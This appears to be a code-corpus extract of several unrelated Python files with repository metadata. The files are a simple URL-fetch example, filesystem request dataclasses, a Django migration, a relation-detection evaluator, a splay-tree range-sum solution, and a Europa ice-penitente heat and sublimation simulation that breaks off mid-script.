| 2021-05-15T03:15:57.150379 | 2020-03-30T00:59:46 | 2020-03-30T00:59:46 | 250,404,701 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 291 |
py
|
## read() returns the response body as raw bytes, which is hard to read directly.
import urllib.request
url="http://example.com/"
res = urllib.request.urlopen(url)
data = res.read()
# Convert the binary payload into a string
text = data.decode("utf-8")
print(text)
|
[
"[email protected]"
] | |
35e0f155082e64c88bf8b1155a6da2dc8d25fc31
|
447b17ac1893d5e09cbce365761ded8b61f33956
|
/ifs/filesystem/models.py
|
a619dea66a2168c89927e483b9b4e106731382b6
|
[] |
no_license
|
yulkes/workshop-sample-solution
|
eb69a3e7bb3e7056321348c1c6eee5d309a18411
|
0fc6378c31e329dca85041df6063ac2ce835c720
|
refs/heads/main
| 2023-05-24T21:22:04.129446 | 2020-07-24T15:00:30 | 2020-07-24T15:00:30 | 280,848,181 | 1 | 0 | null | 2023-05-23T00:11:33 | 2020-07-19T11:07:47 |
Python
|
UTF-8
|
Python
| false | false | 1,188 |
py
|
from dataclasses import dataclass, field
from logging import Logger
from pathlib import Path
from typing import List
# Module-level logger.  NOTE(review): this instantiates Logger directly
# instead of using logging.getLogger(__name__), bypassing the logging
# hierarchy/configuration; it is also not referenced in this module.
logger = Logger(__name__)
@dataclass
class DirectoryListing:
    """Collects the files and subdirectories found under *base_path*."""

    base_path: Path
    files: List[Path] = field(default_factory=list)
    dirs: List[Path] = field(default_factory=list)

    def add_file(self, path: Path):
        """Sort *path* into dirs or files; other file types are silently skipped."""
        if path.is_dir():
            self.dirs.append(path)
        elif path.is_file():
            self.files.append(path)

    def to_dict(self):
        """Return a JSON-friendly dict view of this listing.

        Can be extracted to a standalone JSON converter later on.
        """
        return {
            "filename": str(self.base_path),
            "dirs": [str(entry.name) for entry in self.dirs],
            "files": [str(entry.name) for entry in self.files],
        }

    def __bool__(self):
        """A listing is truthy once it holds at least one file or directory."""
        return bool(self.files or self.dirs)
@dataclass
class DirListingRequest:
    """Request to list the contents of a directory."""
    # Directory whose contents should be listed.
    base_path: Path
@dataclass
class DeleteFileRequest:
    """Request to delete a single file."""
    # Path of the file to delete.
    file_path: Path
@dataclass
class RenameFileRequest:
    """Request to rename (move) a file from old_path to new_path."""
    # Current path of the file.
    old_path: Path
    # Desired new path.
    new_path: Path
|
[
"[email protected]"
] | |
a93c88113c884a9df489879c2717ce2816a0ac34
|
472bd1a9bff63576cf6ce8813a569f350b550645
|
/getdata/migrations/0001_initial.py
|
23312910b5a76bcb40c7f809ffc2e403c5ef2f09
|
[] |
no_license
|
karankwatra/chicago_data_sources
|
f6dad59c6acedff0a760aa2011f7638ddf0cdfb1
|
ae8a25bb7727ba3720c72444ddaab753206332ee
|
refs/heads/master
| 2021-05-09T20:54:33.047806 | 2018-02-17T08:09:41 | 2018-02-17T08:09:41 | 118,713,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
# Generated by Django 2.0.1 on 2018-01-24 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the Question model with an
    # auto primary key, a question_text CharField and a pub_date timestamp.
    # Prefer generating a follow-up migration over editing this one by hand.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_text', models.CharField(max_length=200)),
                ('pub_date', models.DateTimeField(verbose_name='date published')),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
ebbf372f122d1b3b4628688630c2a22d58f2bfa0
|
15f647b8cf73c283b1491a259087a0ab209b70ba
|
/relation_detection/relation-evaluator.py
|
1fe528a7de37070eb4d50c7767865100c3ae0b63
|
[] |
no_license
|
shen1993/relation-detection
|
8c2e17106b3db6dd4146747da2f7c6ee2d619c10
|
8dd315a280101a922c41f01292995a87778327a4
|
refs/heads/master
| 2020-06-01T06:14:35.043727 | 2019-06-07T01:51:25 | 2019-06-07T01:51:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,344 |
py
|
#!/usr/bin/python
#compute the accuracy of an NE tagger
#usage: evaluate-head.py [gold_file][output_file]
import sys, re
if len(sys.argv) != 3:
    sys.exit("usage: evaluate-head.py [gold_file][output_file]")
#gold standard file
goldfh = open(sys.argv[1], 'r')
#system output
testfh = open(sys.argv[2], 'r')
gold_tag_list = []
#gold_word_list = []
test_tag_list = []
# blank/whitespace-only lines are skipped in both files
emptyline_pattern = re.compile(r'^\s*$')
for gline in goldfh.readlines():
    if not emptyline_pattern.match(gline):
        parts = gline.split()
        #print parts
        gold_tag_list.append(parts[0])
for tline in testfh.readlines():
    if not emptyline_pattern.match(tline):
        parts = tline.split()
        #print parts
        test_tag_list.append(parts[0])
test_total = 0
gold_total = 0
correct = 0
#print gold_tag_list
#print test_tag_list
# Count gold relations, predicted relations, and exact label matches;
# 'no_rel' marks the absence of a relation and is excluded from all counts.
for i in range(len(gold_tag_list)):
    if gold_tag_list[i] != 'no_rel':
        gold_total += 1
    if test_tag_list[i] != 'no_rel':
        test_total += 1
    if gold_tag_list[i] != 'no_rel' and gold_tag_list[i] == test_tag_list[i]:
        correct += 1
# NOTE(review): these divisions raise ZeroDivisionError when either file
# contains only 'no_rel' tags (test_total or gold_total == 0), and the f1
# line divides by zero when correct == 0; consider guarding them.
precision = float(correct) / test_total
recall = float(correct) / gold_total
f = precision * recall * 2 / (precision + recall)
#print correct, gold_total, test_total
print ('precision =', precision, 'recall =', recall, 'f1 =', f)
|
[
"[email protected]"
] | |
6757f60ad54e92de598316caec907e610dd16c53
|
e01c5d1ee81cc4104b248be375e93ae29c4b3572
|
/Sequence4/DS/Week5/submission/sub-range-4.py
|
585c33c2a3133ca7749fcb1568e035d6b909e7e3
|
[] |
no_license
|
lalitzz/DS
|
7de54281a34814601f26ee826c722d123ee8bd99
|
66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1
|
refs/heads/master
| 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,351 |
py
|
# python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
    """A splay-tree node: a key, the sum of keys in its subtree, and links
    to its left child, right child, and parent."""

    def __init__(self, key, sum, left, right, parent):
        self.key = key
        self.sum = sum
        self.left = left
        self.right = right
        self.parent = parent
class SplayTree:
    """Splay tree maintaining, at every vertex, the sum of keys in its subtree."""
    def update(self, v):
        """Recompute v.sum from its children and repair the children's parent links."""
        if v == None:
            return
        v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
        if v.left != None:
            v.left.parent = v
        if v.right != None:
            v.right.parent = v
    def smallRotation(self, v):
        """Single (zig) rotation lifting v above its parent."""
        parent = v.parent
        if parent == None:
            return
        grandparent = v.parent.parent
        if parent.left == v:
            m = v.right
            v.right = parent
            parent.left = m
        else:
            m = v.left
            v.left = parent
            parent.right = m
        self.update(parent)
        self.update(v)
        v.parent = grandparent
        if grandparent != None:
            if grandparent.left == parent:
                grandparent.left = v
            else:
                grandparent.right = v
    def bigRotation(self, v):
        """Double rotation: zig-zig when v and its parent are same-side
        children, zig-zag otherwise."""
        if v.parent.left == v and v.parent.parent.left == v.parent:
            # Zig-zig
            self.smallRotation(v.parent)
            self.smallRotation(v)
        elif v.parent.right == v and v.parent.parent.right == v.parent:
            # Zig-zig
            self.smallRotation(v.parent)
            self.smallRotation(v)
        else:
            # Zig-zag
            self.smallRotation(v)
            self.smallRotation(v)
    # Makes splay of the given vertex and makes
    # it the new root.
    def splay(self, v):
        if v == None:
            return None
        while v.parent != None:
            if v.parent.parent == None:
                self.smallRotation(v)
                break
            self.bigRotation(v)
        return v
    # Searches for the given key in the tree with the given root
    # and calls splay for the deepest visited node after that.
    # Returns pair of the result and the new root.
    # If found, result is a pointer to the node with the given key.
    # Otherwise, result is a pointer to the node with the smallest
    # bigger key (next value in the order).
    # If the key is bigger than all keys in the tree,
    # then result is None.
    def find(self, root, key):
        v = root
        last = root
        next = None
        while v != None:
            if v.key >= key and (next == None or v.key < next.key):
                next = v
            last = v
            if v.key == key:
                break
            if v.key < key:
                v = v.right
            else:
                v = v.left
        root = self.splay(last)
        return (next, root)
    def split(self, root, key):
        """Split into (keys < key, keys >= key); both halves are splayed roots."""
        (result, root) = self.find(root, key)
        if result == None:
            return (root, None)
        right = self.splay(result)
        left = right.left
        right.left = None
        if left != None:
            left.parent = None
        self.update(left)
        self.update(right)
        return (left, right)
    def merge(self, left, right):
        """Merge two trees where every key in `left` precedes every key in `right`."""
        if left == None:
            return right
        if right == None:
            return left
        while right.left != None:
            right = right.left
        right = self.splay(right)
        right.left = left
        self.update(right)
        return right
class SetRange:
    """Ordered integer set with insert/erase/search and range-sum queries,
    implemented on top of a splay tree (each vertex stores its subtree sum)."""

    def __init__(self):
        # Bug fix: `root` and `S` used to be *class* attributes, so every
        # SetRange instance shared one tree (and therefore one data set).
        # They are now per-instance state; plain `SetRange()` callers are
        # unaffected.
        self.root = None
        self.S = SplayTree()

    def insert(self, x):
        """Insert x; no-op if it is already present."""
        (left, right) = self.S.split(self.root, x)
        new_vertex = None
        if right == None or right.key != x:
            new_vertex = Vertex(x, x, None, None, None)
        self.root = self.S.merge(self.S.merge(left, new_vertex), right)

    def erase(self, x):
        """Remove x if present; no-op otherwise."""
        if self.search(x) is None:
            return
        # search() splays the found node, so x is at the root here.
        self.S.splay(self.root)
        self.root = self.S.merge(self.root.left, self.root.right)
        if self.root is not None:
            self.root.parent = None

    def search(self, x):
        """Return x if stored, else None (splays the tree as a side effect)."""
        result, self.root = self.S.find(self.root, x)
        if result is None or self.root.key != x:
            return None
        return result.key

    def sum(self, fr, to):
        """Return the sum of all stored keys in the inclusive range [fr, to]."""
        (left, middle) = self.S.split(self.root, fr)
        (middle, right) = self.S.split(middle, to + 1)
        if middle is None:
            ans = 0
            self.root = self.S.merge(left, right)
        else:
            ans = middle.sum
            self.root = self.S.merge(self.S.merge(left, middle), right)
        return ans

    def get_tree(self):
        """Debug helper: print the root key, then every key in order."""
        print(self.root.key)
        self._get_tree(self.root)

    def _get_tree(self, root):
        # in-order traversal, printing one key per line
        if root:
            self._get_tree(root.left)
            print(root.key)
            self._get_tree(root.right)
def main():
    """Process n stdin commands against a SetRange:

    '+ x' insert, '- x' erase, '? x' membership ("Found"/"Not found"),
    's l r' print the range sum, 'c' debug-print the tree.
    All operands are shifted by the last sum result modulo MODULO (the
    standard forced-online transformation for this problem format).
    """
    MODULO = 1000000001
    n = int(stdin.readline())
    last_sum_result = 0
    s = SetRange()
    for i in range(n):
        line = stdin.readline().split()
        if line[0] == '+':
            x = int(line[1])
            s.insert((x + last_sum_result) % MODULO)
        elif line[0] == '-':
            x = int(line[1])
            s.erase((x + last_sum_result) % MODULO)
        elif line[0] == '?':
            x = int(line[1])
            print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
        elif line[0] == 's':
            l = int(line[1])
            r = int(line[2])
            res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
            print(res)
            last_sum_result = res % MODULO
        elif line[0] == 'c':
            s.get_tree()
|
[
"[email protected]"
] | |
0f18188c5e6dd84f4318dceee1a28bd84ad64df4
|
94efec085757ca8a1956e6a0b6cb93cac792e522
|
/cathles_bounce_heating.py
|
c64a87a577e1afa5db82cfbd02ad883ceabdc134
|
[] |
no_license
|
SiccarPoint/penitentes
|
327845a37b03351c0ef504907833268fce51545b
|
7b720aeaf157b5dc471975c80ba99840224e19bd
|
refs/heads/master
| 2021-01-10T15:41:38.572631 | 2015-10-01T01:39:12 | 2015-10-01T01:39:12 | 43,472,662 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 25,780 |
py
|
# this code follows Cathles et al., 2014, and whence Cathles et al., 2011,
# for its approach
# This iteration of this code attempts to allow the surface to be cooler than
# the melting pt, which is explicitly assumed by Cathles. We need to thus add
# reradiation, temp changes, and a sublimation rate which is dependent on T,
# not the radiative flux itself (i.e., adopt the original Hobley (in prep.)
# method, following Lebovsky).
import numpy as np
from pylab import plot, figure, show
import scipy.interpolate as interp
true_albedo = 0.55 # Jeff's bolometric albedo
ice_density = 494. # check these data
L_subl = 51000./0.018 # J/mol / kg/mol,
# the change enthalpy of sublimation div by molecular weight
true_incoming_intensity = 50. # 50 Wm**-2
#
sun_declination = 0. # orbital locking
latitude = 0. # equator for now
emissivity = 0.9 # Jeff gives 0.9, 0.97 is standard ice
stefan_boltz = 5.670373e-8
thermal_cond = 4.2 # W/m/K ...bit of a guess at low T
## NB - Jeff's best fit gives conductivity*specific heat = 10
# assuming the SHC is solid-ish (as it scales to mass, so porosity already in):
# thermal_cond *~ 0.05
# let's assume this!!
thermal_cond *= 0.05 ####
#thermal_cond = 0.01 # ...if shc ~1000 (18/0.018)
# a conservative end member approach would be to share the fraction equally...
#note both thermal_cond & shc * 0.05 makes their product 10.
# NOTE(review): set to False despite the "always leave True" comment — confirm
mobile_pts = False # always leave this set to True!!
temp_pts = np.array([73.,93.,113.,133.,173.]) # temperatures in K for shc
shc = np.array([12.2,15.,17.3,19.8,24.8])/0.018 #specific heat capacity in J/kg/K
shc *= 0.05 ####
diffusivities = thermal_cond/ice_density/shc
initial_T = 106. # coldest nighttime Ts at the equator are 90; NEVER below 73.
# this is Jeff's mean T
coldest_diffusivity = np.interp(initial_T, temp_pts, diffusivities)
num_pts = 50 # 100
pt_spacing = 0.02 # 0.01
num_sinusoids = 1
amplitude = 1.*num_pts*pt_spacing/num_sinusoids # per Cathles
array_length = num_pts*pt_spacing # note we incorporate the final segment
# array_length is only the x dimension
tstep = 60.*60.*24.*365.*1. # an earth year, in earth secs (1/3.55 Eudays)
# NOTE(review): immediately overrides the year-long tstep set above
tstep = 400.
num_tsteps = 1000 # 10000
num_tsteps = 800 # a little after midday
# initialize them as a flat surface
node_x = np.arange(num_pts, dtype=float)*pt_spacing
node_z = np.zeros(num_pts, dtype=float) + np.random.rand(num_pts)/10.
# node_z[::2] = -0.1
# Cathles uses a sinusoid...
node_z = amplitude/2.*np.sin(node_x/array_length*2.*np.pi*num_sinusoids)
# NOTE(review): zeroes the sinusoid just computed — the run starts flat
node_z.fill(0.)
# this version of the code tries to model a single day on europa.
# our day will start at 6am, the coldest time
a_europa_day = 60.*60.*24.*3.55 # in secs
def get_hour_angle(time_elapsed):
    """Solar hour angle (radians) at *time_elapsed* seconds since dawn.

    The first half of the Europa day is daylight: the angle sweeps from
    arcsin(-1) at dawn to arcsin(+1) at the end of that half.  Returns None
    during the night half.
    """
    day_fraction = (time_elapsed / a_europa_day) % 1.
    # the modulo guarantees day_fraction >= 0, so only the upper bound matters
    if day_fraction < 0.5:
        return np.arcsin(4. * day_fraction - 1.)
    return None
# node_z[2] -= 1
# ^flat, with noise
num_segments = num_pts
# save the init conds:
init_node_x = node_x.copy()
init_node_z = node_z.copy()
# Tile the profile three times, shifted by +/- one array_length, so the
# per-segment geometry/shading calculations below see periodic neighbours
# on both sides.
node_x_exp = np.empty(num_pts*3, dtype=float)
node_z_exp = np.empty(num_pts*3, dtype=float)
node_x_exp[num_pts:(2*num_pts)] = node_x
node_x_exp[:num_pts] = node_x - array_length
node_x_exp[(2*num_pts):] = node_x + array_length
node_z_exp[num_pts:(2*num_pts)] = node_z
node_z_exp[:num_pts] = node_z
node_z_exp[(2*num_pts):] = node_z
# per-segment scratch arrays (one entry per segment of the tiled profile):
# dx/dz components, midpoints, length, normal angle, and line eqn (m, c)
seg_dx = np.empty(num_pts*3-1, dtype=float)
seg_dz = np.empty_like(seg_dx)
seg_centx = np.empty_like(seg_dx)
seg_centz = np.empty_like(seg_dx)
seg_length = np.empty_like(seg_dx)
seg_angle = np.empty_like(seg_dx)
seg_m = np.empty_like(seg_dx)
seg_c = np.empty_like(seg_dx)
new_contour_cumlen = np.zeros(num_pts+1, dtype=float)
new_lengths = np.zeros(num_pts+1, dtype=float)
deepest_elev = np.empty(num_tsteps, dtype=float) # this stores the pit depths
num_section_pts = 40
seg_section_T = np.empty((num_pts*3-1, num_section_pts), dtype=float)
# ^this is a section down into each seg, used for transient T calcs
seg_section_T.fill(initial_T)
seg_section_fluxes = np.zeros((num_pts*3-1, num_section_pts+1), dtype=float)
# ^this is the heat fluxes up and down the vertical section
surf_T = seg_section_T[:,0]
surf_T_record = []
E_record = []
def diffuse_heat(flux_in, seg_section_T, seg_section_fluxes, seg_length):
    """
    Transient 1D heat diffusion into the ice for every surface segment.

    Parameters
    ----------
    flux_in : array (num_segments,)
        Absorbed radiative flux arriving at each segment (W/m).  It does NOT
        include the reradiated part, which is recomputed every sub-step.
    seg_section_T : array (num_segments, num_section_pts)
        Temperature profile down into each segment (K); updated in place.
    seg_section_fluxes : array (num_segments, num_section_pts + 1)
        Scratch array for the vertical heat fluxes; overwritten.
    seg_length : array (num_segments,)
        Surface length of each segment (m).

    Returns
    -------
    The surface temperatures — a view of seg_section_T[:, 0].
    """
    deep_Ts = seg_section_T[:,-1].copy()  # basal temperatures, held fixed
    node_spacing = 0.002  # vertical grid spacing in m (= 2 mm; the original
                          # comment said "0.3 mm", which did not match)
    dt_int = 0.25 * node_spacing * node_spacing / coldest_diffusivity
    # ^conservative von Neumann condition
    repeats = int(tstep // dt_int) + 1
    dt_int = tstep/repeats  # again, conservative
    # Bug fix: the loop used Python-2-only `xrange`, a NameError on Python 3;
    # `range` behaves identically in a for-loop.
    for i in range(repeats):
        # get the radiative loss:
        fluxes_out = emissivity*stefan_boltz*seg_section_T[:,0]**4  # W/m**2
        # get the gradients
        grads = (seg_section_T[:,:-1] - seg_section_T[:,1:])/node_spacing
        # temperature-dependent diffusivities evaluated at the link midpoints
        link_mean_T = (seg_section_T[:,:-1] + seg_section_T[:,1:])/2.
        alphas = np.interp(link_mean_T, temp_pts, diffusivities)
        # calc the internal fluxes
        seg_section_fluxes[:,1:-1] = alphas*grads  # +ve OUT
        # surface BC: absorbed input minus reradiation
        seg_section_fluxes[:,0] = (flux_in/seg_length-fluxes_out)
        # basal BC: the temperature (not the flux) is fixed at depth — see
        # the re-pinning of deep_Ts after the update below
        seg_section_fluxes *= seg_length.reshape((seg_length.size,1))
        # ^convert to true fluxes
        seg_section_T[:,:] += (seg_section_fluxes[:,:-1] -
                               seg_section_fluxes[:,1:])*dt_int
        seg_section_T[:,-1] = deep_Ts  # hold the base of each profile fixed
    return seg_section_T[:,0]  # return the surface Ts
for t in xrange(num_tsteps):
print(t)
seg_dx[:] = node_x_exp[1:]-node_x_exp[:-1]
seg_dz[:] = node_z_exp[1:]-node_z_exp[:-1]
seg_centx[:] = (node_x_exp[1:]+node_x_exp[:-1])/2.
seg_centz[:] = (node_z_exp[1:]+node_z_exp[:-1])/2.
seg_length[:] = np.sqrt(np.square(seg_dx)+np.square(seg_dz))
seg_angle[:] = np.arctan2(seg_dz, seg_dx)
# consistent w Cathles, ccw from vertical is +ve; describes the normal
seg_m[:] = seg_dz/seg_dx
seg_c[:] = node_z_exp[:-1] - seg_m*node_x_exp[:-1]
angle_factor = np.empty((seg_centx.size, seg_centx.size), dtype=float)
connectivity_matrix = np.empty_like(angle_factor, dtype=bool)
# hour_angle = 0. # midday
hour_angle = get_hour_angle(t*tstep)
if hour_angle is not None: #daytime
true_sun_zenith_angle = np.arccos(np.sin(latitude)*np.sin(
sun_declination) + np.cos(latitude)*np.cos(
sun_declination)*np.cos(hour_angle))
altitude_angle = np.pi/2. - true_sun_zenith_angle
sin_az = np.sin(hour_angle)*np.cos(sun_declination)/np.cos(altitude_angle)
true_sun_az_angle = np.arcsin(sin_az.clip(-1.,1.))
# ...per wiki & itacanet.org page
#print((np.sin(hour_angle),np.cos(sun_declination),np.cos(altitude_angle)))
eff_zenith = np.arctan(np.tan(true_sun_zenith_angle)*np.cos(true_sun_az_angle))
# ^this will break is true zenith == true az == np.pi/2 exactly
eff_intensity_factor = np.sqrt(np.cos(true_sun_zenith_angle)**2 +
(np.sin(true_sun_zenith_angle) *
np.cos(true_sun_az_angle))**2)
# ...assuming structures form E-W
else:
eff_zenith = 0.
eff_intensity_factor = 0. #no light allowed
## ^^this section now VERIFIED as well behaved!!
if eff_intensity_factor > 0.: # if it's night, this is all null
# derive the sky windows
# get angle between seg center and all other nodes:
# ******Note this section ignores looping, i.e., shading from other end
beta_L = np.zeros(num_pts*3, dtype=float)
beta_R = np.zeros_like(beta_L)
which_node_L = np.zeros(num_pts*3, dtype=int)
which_node_R = np.zeros_like(which_node_L)
poss_angles_L = np.zeros((num_pts*3, num_pts*3), dtype=float)
poss_angles_R = np.zeros_like(poss_angles_L)
for i in xrange(num_segments*3-1):
poss_angles_L[i, :(i+1)] = (np.arctan2(node_z_exp[:(i+1)]-seg_centz[i],
node_x_exp[:(i+1)]-seg_centx[i])-0.5*np.pi)
poss_angles_R[i, (i+1):] = (np.arctan2(node_z_exp[(i+1):]-seg_centz[i],
node_x_exp[(i+1):]-seg_centx[i])-0.5*np.pi)
poss_angles_L[i, :(i+1)] = np.where(poss_angles_L[i, :(i+1)] <= -np.pi,
poss_angles_L[i, :(i+1)]+2.*np.pi,
poss_angles_L[i, :(i+1)])
poss_angles_R[i, (i+1):] = np.where(poss_angles_R[i, (i+1):] <= -np.pi,
poss_angles_R[i, (i+1):]+2.*np.pi,
poss_angles_R[i, (i+1):])
which_node_L[i] = np.argmin(poss_angles_L[i, :(i+1)])
# min because they're +ve
which_node_R[i] = np.argmax(poss_angles_R[i, (i+1):]) + i + 1
# max because they're -ve
# final additions to put this into "real" IDs
beta_L[i] = poss_angles_L[i, :(i+2)].flatten()[which_node_L[i]]
beta_R[i] = poss_angles_R[i, (i+1):].flatten()[which_node_R[i]-i-1]
# assert np.all(np.less_equal(beta_R, 0.))
# assert np.all(np.greater_equal(beta_L, 0.))
# ...this actually isn't true in the general case... overhangs!
# But think the above still holds
# get illumination fraction
# if the beta angle is the same as the seg_angle, then whole thing
# is illuminated, or it's not (i.e., it's self shaded).
# Interesting cases arise when a vertex not at the ends of the segment
# can shade it
shaded_L = np.greater(eff_zenith, beta_L[:-1])
shaded_R = np.less(eff_zenith, beta_R[:-1])
center_illum = np.logical_not(np.logical_or(shaded_R,
shaded_L)).astype(float)
# ^this is the fraction we want
# find the points where we change from full to no illum of centers:
changed_illum_L = np.where(np.diff(shaded_L))[0] + 1
changed_illum_R = np.where(np.diff(shaded_R))[0] + 1
# ^there *can* be more than 1 ID in these arrays
angle_next_node_notL = np.arctan2(-node_z_exp[changed_illum_L]+node_z_exp[
which_node_L[changed_illum_L]],
-node_x_exp[changed_illum_L]+node_x_exp[
which_node_L[changed_illum_L]]
) - 0.5*np.pi
# A negative val here indicates the node looked AT ITSELF
# ...note this is actually the next node right, but relevant to the
# "L" labelled variables...!
# The ID for the segment left of the node is changed_illum_L-1
# The ID for the segment right of the node is changed_illum_L
for i in xrange(angle_next_node_notL.size):
if (eff_zenith > angle_next_node_notL[i]) and (
angle_next_node_notL[i] >= 0):
# the node is shadowed, and the segment TO ITS RIGHT is partially
# illuminated (i.e., it's illum is DECREASED from 1.)
center_illum[changed_illum_L[i]] -= 0.5*(1. - (beta_L[
changed_illum_L[i]] - eff_zenith)/(beta_L[changed_illum_L[i]] -
angle_next_node_notL[i]))
# use minus not times as it's possible we're further decreased on
# the same segment from the RHS
elif eff_zenith < angle_next_node_notL[i]:
# the node is illuminated, and the segment TO ITS LEFT is partially
# illuminated (i.e., it's illum is INCREASED from 0.)
center_illum[changed_illum_L[i]-1] += 0.5*(angle_next_node_notL[
i] - eff_zenith)/(
angle_next_node_notL[
i] - beta_L[
changed_illum_L[i]-1])
else: # self-shadowed seg or perfectly grazing light => no changes
pass
# repeat for the RHS
xdiff = node_x_exp[which_node_R[changed_illum_R]] - node_x_exp[
changed_illum_R]
angle_next_node_notR = np.arctan2(-node_z_exp[changed_illum_R] +
node_z_exp[which_node_R[
changed_illum_R]], xdiff) - 0.5*np.pi
for i in xrange(angle_next_node_notR.size):
# remember, angles are now ALL NEGATIVE
if eff_zenith < angle_next_node_notR[i]:
# node is shadowed, the segment to its left has its illum
# decreased from 1.
center_illum[
changed_illum_R[i]-1] -= 0.5*(eff_zenith -
angle_next_node_notR[i])/(
beta_R[changed_illum_R[i]-1] -
angle_next_node_notR[i])
# -ves hopefully sort themselves out
elif eff_zenith > angle_next_node_notR[i] and (
angle_next_node_notR[i] != beta_R[changed_illum_R[i]]):
# 2nd condition excl. self-shadowing
center_illum[
changed_illum_R[i]] += 0.5*(angle_next_node_notR[i] -
eff_zenith)/(
angle_next_node_notR[i] -
beta_R[changed_illum_R[i]])
else:
pass
# calc direct illumination terms:
part = center_illum * true_incoming_intensity * eff_intensity_factor *\
seg_length * np.cos(seg_angle-eff_zenith)
# calc reradiation:
rerad = seg_length * emissivity * stefan_boltz * surf_T**4
R_d = (true_albedo*part) + rerad
E_d = (1.-true_albedo)*part
# get the angle factor
cent_dists_to_all_nodes = np.sqrt(np.square(seg_centx.reshape((
seg_centx.size, 1)) - node_x_exp.reshape((1, node_x_exp.size))) +
np.square(seg_centz.reshape((seg_centz.size, 1)) -
node_z_exp.reshape((1, node_z_exp.size))))
arccos_frag = (np.square(cent_dists_to_all_nodes[:, :-1]) +
np.square(cent_dists_to_all_nodes[:, 1:]) -
np.square(seg_length))/(2.*cent_dists_to_all_nodes[:, :-1] *
cent_dists_to_all_nodes[:, 1:])
arccos_frag[arccos_frag > 1.] = 1.
arccos_frag[arccos_frag < -1.] = -1.
# ...some kind of rounding error was getting in here.
angle_factor[:, :] = np.arccos(arccos_frag)/np.pi
# angle_factor[np.eye(angle_factor.shape[0], dtype=bool)] = 0.
# ^this isn't necessary as we do it via the connectivity matrix
# now the connectivity matrix
# this is CRAZY slow, so only do it once every 20 steps! Form rarely
# changes fast enough for this to matter
# NB: the resampling scotches this. Might be possible to fudge it??
if True: # t % (num_tsteps//1) == 0:
# do segments face each other?
center_angles = (np.arctan2(seg_centz.reshape((1, seg_centz.size)) -
seg_centz.reshape((seg_centz.size, 1)),
seg_centx.reshape((1, seg_centx.size)) -
seg_centx.reshape((seg_centx.size, 1))) -
0.5*np.pi)
# note self gets -pi/2.
center_angles = np.where(center_angles <= -np.pi, center_angles+2.*np.pi,
center_angles)
angle_between = center_angles - seg_angle.reshape((seg_angle.size, 1))
connect_oneway = np.greater(np.cos(angle_between), 0.)
# connect_oneway = np.logical_and(connect_oneway, connect_oneway.T)
# ^ we do this below...
connect_oneway[np.eye(connect_oneway.shape[0], dtype=bool)] = False
##figure(0)
##plot(node_x_exp[:-1], np.sum(connect_oneway, axis=0))
# ^can't illuminate yourself. Parallel surfaces may or may not be true
# now line of sight. We'll have to do this the crude way, I think
# this is PAINFULLY SLOW
for i in xrange(num_pts*3-2):
for j in xrange(i+1, num_pts*3-1):
head_x = seg_centx[i]
head_z = seg_centz[i]
tail_x = seg_centx[j]
tail_z = seg_centz[j]
node_x_vals = node_x_exp[(i+1):(j+1)]
node_z_vals = node_z_exp[(i+1):(j+1)]
line_grad = (tail_z-head_z)/(tail_x-head_x)
line_const = head_z-line_grad*head_x
proj_z_vals = line_grad*node_x_vals + line_const
# ^the vals the nodes "would have" if on the line
if not np.logical_or(np.all(np.greater(proj_z_vals, node_z_vals)),
np.all(np.greater(node_z_vals, proj_z_vals))):
# ...not all above, or all below
# set the connectivity to 0
connect_oneway[i, j] = False
# the transposition below takes care of [j,i]
connectivity_matrix[:, :] = np.logical_and(
connect_oneway, connect_oneway.T)
# ^BOTH normals must point at each other
# now, solve the matrix:
A_ij = true_albedo*angle_factor.T*connectivity_matrix*seg_length
# ...Cathles had dropped the connectivity_matrix is his equ. A13
identity_less_A = np.identity(A_ij.shape[0]) - A_ij
R = np.linalg.solve(identity_less_A, R_d)
E = E_d + np.sum((1.-true_albedo) * seg_length *
connectivity_matrix*angle_factor.T * R,
axis=1)
else:
E = 0. # it's nighttime, baby
E_record.append(E)
surf_T = diffuse_heat(E, seg_section_T, seg_section_fluxes, seg_length)
surf_T_record.append(surf_T.mean())
# now we're going to implement Lebofsky's method for sublimation rate:
vaporP = 133.322368*np.power(10., -2445.5646/surf_T +
8.2312*np.log10(surf_T) - 0.0167706*surf_T +
1.20514e-5*np.square(surf_T) - 6.757169)
# now Hertz-Knudsen:
Hdot_perseg_timestime = vaporP * np.sqrt(0.0180154 /
(np.pi*8.3144621*surf_T)) / \
ice_density * tstep
### does there need to be a division by seg_length here?
#Hdot_perseg_timestime = E/(ice_density*L_subl*seg_length)*tstep
A_ij2 = np.identity(seg_length.size, dtype=float) * seg_length/3.
A_ij2[1:, 1:] += np.identity(seg_length.size-1,
dtype=float) * seg_length[:-1]/3.
A_ij2[0, 0] += seg_length[-1]/3.
# the factor of 2 arises as each node appears on 2 segments
# A_ij2[0, 0] = seg_length[0]/3.
# A_ij2[-1, -1] = seg_length[-1]/3. # invoke looped BCs
A_ij2[0, 1] = seg_length[0]/6.
A_ij2[0, -1] = seg_length[-1]/6.
A_ij2[-1, -2] = seg_length[-1]/6. # entries we'll miss otherwise
A_ij2[-1, 0] = seg_length[-2]/6.
for i in xrange(1, seg_length.size-1):
A_ij2[i, i-1] = seg_length[i-1]/6.
A_ij2[i, i+1] = seg_length[i]/6.
bdot_hyp = Hdot_perseg_timestime*seg_length/2.
bdot_x = bdot_hyp*np.sin(seg_angle) # formerly -ve, but didn't make sense
bdot_z = -bdot_hyp*np.cos(seg_angle) # for each seg
